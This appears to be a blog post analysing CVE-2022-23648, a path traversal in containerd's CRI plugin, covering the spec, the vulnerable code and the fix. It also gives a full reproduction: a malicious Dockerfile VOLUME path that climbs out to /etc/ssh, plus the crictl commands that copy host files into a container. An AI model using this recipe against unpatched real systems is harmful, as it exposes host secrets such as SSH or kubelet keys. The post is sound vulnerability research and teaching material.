Path traversal is a classical kind of security issue in computer world. This is logical issue so even with the rapid development of technology, this kind of issue still appear in software. This post try to analysis a path traversal issue in containerd which is discovered by Felix Wilhelm. The first part let’s try to explain the related spec so that we can know what the function is and what the violation the implementation has.
Container has a concept of volume. If a container has no volume, the data we changed in container will disappear after the container is destroyed. In order to save data persistently or share data between containers, container came up with the concept of volume. A volume is often(if not all) implemented using bind mount. We can use -v in docker to add a volume.
root@ubuntu:/home/test/CVE-2022-23648# mkdir test
root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm -v /home/test/CVE-2022-23648/test:/test ubuntu bash
root@c201b6a39be2:/# mount | grep test
/dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
root@ecc59c1f5bc4:/# ls /test/
aaa
root@ecc59c1f5bc4:/# cat /test/aaa
data in host
root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
root@ecc59c1f5bc4:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa
data in host
data in guest
‘docker inspect containerid’ in the host will show the data in “Mounts”.
"Mounts": [
{
"Type": "bind",
"Source": "/home/test/CVE-2022-23648/test",
"Destination": "/test",
"Mode": "",
"RW": true,
"Propagation": "rprivate"
}
],
The OCI image spec also has a field named ‘Volumes’. The definition says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.
Let’s try to test this feature. First create a Dockerfile.
from ubuntu:20.04
VOLUME /volume-test/
Build it and start a container. We can see there is a mount in the container.
root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /volume-test/
---> Running in 2b744c0f90ff
Removing intermediate container 2b744c0f90ff
---> 1cf01e39ec82
Successfully built 1cf01e39ec82
Successfully tagged volume-test:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
root@a301238d982c:/# ls -lh /volume-test/
total 0
root@a301238d982c:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
The ‘docker inspect’ shows the mount inforamtion as following.
"Mounts": [
{
"Type": "volume",
"Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
"Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
"Destination": "/volume-test",
"Driver": "local",
"Mode": "",
"RW": true,
"Propagation": ""
}
],
The ‘docker image inspect’ show the following info:
"Volumes": {
"/volume-test/": {}
},
As we can see the ‘Source’ is generated by the runtime ifself and the ‘Destination’ is the name of VOLUME.
As Felix points out When this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md.
“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”
The point here is ‘seed the contents of the mount with data in the image at the same location’. It means if the image has data in the mount directory the implementation should also contains the origin data.
root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
RUN mkdir /volume-test
RUN echo "volume data" > /volume-test/aaa
VOLUME /volume-test/
root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
Sending build context to Docker daemon 3.584kB
Step 1/4 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/4 : RUN mkdir /volume-test
---> Using cache
---> a05c3161c55d
Step 3/4 : RUN echo "volume data" > /volume-test/aaa
---> Running in 60702a1547f5
Removing intermediate container 60702a1547f5
---> 4702775454c2
Step 4/4 : VOLUME /volume-test/
---> Running in 14963733faf9
Removing intermediate container 14963733faf9
---> cc3e2700af76
Successfully built cc3e2700af76
Successfully tagged volume-test1:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
root@20939034b463:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
root@20939034b463:/# ls /volume-test/
aaa
root@20939034b463:/# cat /volume-test/aaa
volume data
As we can see, the origin data is in the volue. This is mean ‘seed’ the data. If we do more investigation we can see there are two file named ‘aaa’.
root@ubuntu:/home/test# find /var/lib/ -name aaa
/var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
/var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
/var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa
The first is the ‘data’ in the volume, the second and third is the same file which in the container image. The first file is copied from the second directory.
Now we know how the ‘VOLUME’ works from OCI image configuration to OCI runtime configuration. In order to seed the data, the converter need to copy the data in the original image to the container’s mount directory.
The vulnerability occurs in the seed process of containerd. Say if we set the VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”, then the copy process will be:
copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/ /var/lib/docker/volumes/yyy/_data/
The containerd tries to copy the file in image to the volumes. But it doesn’t check the src this src can be controlled in the OCI image configuration.
The ‘volumeMounts’ in ‘cri/server/container_create.go’ create mounts from ‘Volumes’.
func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
...
var mounts []*runtime.Mount
for dst := range config.Volumes {
...
volumeID := util.GenerateID()
src := filepath.Join(containerRootDir, "volumes", volumeID)
// addOCIBindMounts will create these volumes.
mounts = append(mounts, &runtime.Mount{
ContainerPath: dst,
HostPath: src,
SelinuxRelabel: true,
})
}
return mounts
}
The ‘ContainerPath’ can be the malicious path.
Later in the same function the ‘HostPath’ is cleaned, but the ‘ContainerPath’ is not.
if len(volumeMounts) > 0 {
mountMap := make(map[string]string)
for _, v := range volumeMounts {
mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
}
opts = append(opts, customopts.WithVolumes(mountMap))
}
Finally in ‘WithVolumes’ in ‘pkg/cri/opts/container.go’.
for host, volume := range volumeMounts {
// The volume may have been defined with a C: prefix, which we can't use here.
volume = strings.TrimPrefix(volume, "C:")
for _, mountPath := range mountPaths {
src := filepath.Join(mountPath, volume)
if _, err := os.Stat(src); err != nil {
if os.IsNotExist(err) {
// Skip copying directory if it does not exist.
continue
}
return fmt.Errorf("stat volume in rootfs: %w", err)
}
if err := copyExistingContents(src, host); err != nil {
return fmt.Errorf("taking runtime copy of volume: %w", err)
}
}
}
Here the ‘mountPath’ is the host directory pointing to a part of the container rootfs, ‘volume’ is the malicious path, ‘host’ is the host directory that will be mount in the container. The ‘src’ of ‘copyExistingContents’ parameter will like ‘/xxx/xx/../../../../../../../../../etc’, and becomes ‘/etc/’ and this in the host filesystem. So ‘copyExistingContents’ will copy the host filesystem data to the container.
The fix is in this commit.
@@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
// The volume may have been defined with a C: prefix, which we can't use here.
volume = strings.TrimPrefix(volume, "C:")
for _, mountPath := range mountPaths {
- src := filepath.Join(mountPath, volume)
+ src, err := fs.RootPath(mountPath, volume)
+ if err != nil {
+ return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
+ }
if _, err := os.Stat(src); err != nil {
if os.IsNotExist(err) {
// Skip copying directory if it does not exist.
It just uses the ‘fs.RootPath’ to replace ‘filepath.Join’. The ‘fs.RootPath’ will evaluate and bound any symlink in ‘volume’ to the root directory.
The vulnerability itself is easy to understand. I failed when I tried to use the docker or ctr to reproduce this issue. Fu wei, a containerd maintainer, tells me I should use crictl to reproduce this as the vulnerability code is shipped in the CRI plugin of containerd. This part is mostly about how to setup the crictl environment. In the process I asked a lot from Bonan and Fu wei, thanks! The setup process is mostly from this post
In the cri-tools release page we download a v1.23.0 version.
root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
crictl
root@ubuntu:/home/test# crictl --version
crictl version v1.23.0
Create a new file in /etc/crictl.yaml and add the following configuration.
runtime-endpoint: unix:///var/run/containerd/containerd.sock
image-endpoint: unix:///var/run/containerd/containerd.sock
timeout: 10
debug: false
Create the containerd config file /etc/containerd/config.toml
root@ubuntu:/home/test# mkdir /etc/containerd
root@ubuntu:/home/test# vi /etc/containerd/config.toml
root@ubuntu:/home/test# systemctl restart containerd
root@ubuntu:/home/test# cat /etc/containerd/config.toml
[plugins]
[plugins.cri]
sandbox_image = "rancher/pause:3.1"
[plugins.cri.cni]
bin_dir = "/opt/cni/bin"
conf_dir = "/etc/cni/net.d"
[plugins.cri.registry]
[plugins.cri.registry.mirrors]
[plugins.cri.registry.mirrors."docker.io"]
endpoint = ["https://docker.mirrors.ustc.edu.cn"]
[plugins.linux]
shim = "containerd-shim"
runtime = "runc"
runtime_root = ""
no_shim = false
shim_debug = false
Install cni plugin. Download it from cni plugin page.
root@ubuntu:/home/test# mkdir -p /opt/cni/bin
root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz -C /opt/cni/bin
./
./macvlan
./static
./vlan
./portmap
./host-local
./vrf
./bridge
./tuning
./firewall
./host-device
./sbr
./loopback
./dhcp
./ptp
./ipvlan
./bandwidth
root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
{
"cniVersion": "0.2.0",
"name": "mynet",
"type": "bridge",
"bridge": "cni0",
"isGateway": true,
"ipMasq": true,
"ipam": {
"type": "host-local",
"subnet": "10.22.0.0/16",
"routes": [
{ "dst": "0.0.0.0/0" }
]
}
}
root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
{
"cniVersion": "0.2.0",
"name": "lo",
"type": "loopback"
}
Pull the pause image
root@ubuntu:/home/test# crictl pull registry.aliyuncs.com/google_containers/pause:3.6
Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
k8s.gcr.io/pause:3.6
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
Create the mailicious image
Built it.
root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile
root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /../../../../../../../../etc/ssh
---> Running in 06720320c1f6
Removing intermediate container 06720320c1f6
---> b253bcd6793c
Successfully built b253bcd6793c
Successfully tagged cve-2022-23648:latest
root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
VOLUME /../../../../../../../../etc/ssh
root@ubuntu:/home/test/CVE-2022-23648#
Import it in containerd
root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import cve-2022-23648.tar
unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
root@ubuntu:/home/test/CVE-2022-23648# crictl image
IMAGE TAG IMAGE ID SIZE
docker.io/library/cve-2022-23648 latest b253bcd6793c2 75.1MB
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
Run the malicious image
root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
3bf95742d0fb3 10 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
ba2d0c46c5502 docker.io/library/cve-2022-23648:latest 14 seconds ago Running test 0 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
root@ubuntu:/# ls /etc/ssh/
root@ubuntu:/# ls /etc/ssh
Emmm, no host data. Wha’t wrong. From this page, we can see my containerd is fixed.
root@ubuntu:/home/test# containerd --version
containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2
root@ubuntu:/home/test# which containerd
/usr/bin/containerd
root@ubuntu:/home/test# stat /usr/bin/containerd
File: /usr/bin/containerd
Size: 60305392 Blocks: 117784 IO Block: 4096 regular file
Device: 805h/2053d Inode: 5769129 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2022-03-25 23:43:13.235999616 -0700
Modify: 2022-02-25 12:15:25.000000000 -0800
Change: 2022-03-14 06:37:43.871583849 -0700
Birth: -
Install a lower version.
root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
Stopped sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
Removed sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
1ecc6bee60024 4 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
fe4ef77ab8e31 docker.io/library/cve-2022-23648:latest 7 seconds ago Running test 0 1ecc6bee60024
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
root@ubuntu:/# ls /etc/ssh
host_file ssh_config ssh_config.d
root@ubuntu:/# cat /etc/ssh/host_file
host
root@ubuntu:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# containerd --version
containerd github.com/containerd/containerd 1.3.3-0ubuntu2
Finally we reproduce this vulnerability.
After reproducing this vulnerability, I want to know why docker and ctr can’t work and discuss a lot with Fu wei. Some the conclusion I made(not sure whether it is 100% accurate):
CRI is the interface between Kubernetes and container runtime. OCI is the spec of how to run a container. So there need some software between the CRI and OCI. This software need to implemenetation CRI interface to Kuberentes and they also need to convert the CRI request to the low level OCI spec and lanuch container. containerd、cri-o is this kind of software. The Kubernetes can also use the docker to run container, But it needs the docker-shim to interacts using CRI interface.
As the vulnerability is in the CRI plugin of containerd, we can only trigger it in the CRI path. In this post I use the crictl to trigger it. It can be also triggered in the Kubernetes which uses the containerd as the CRI runtime.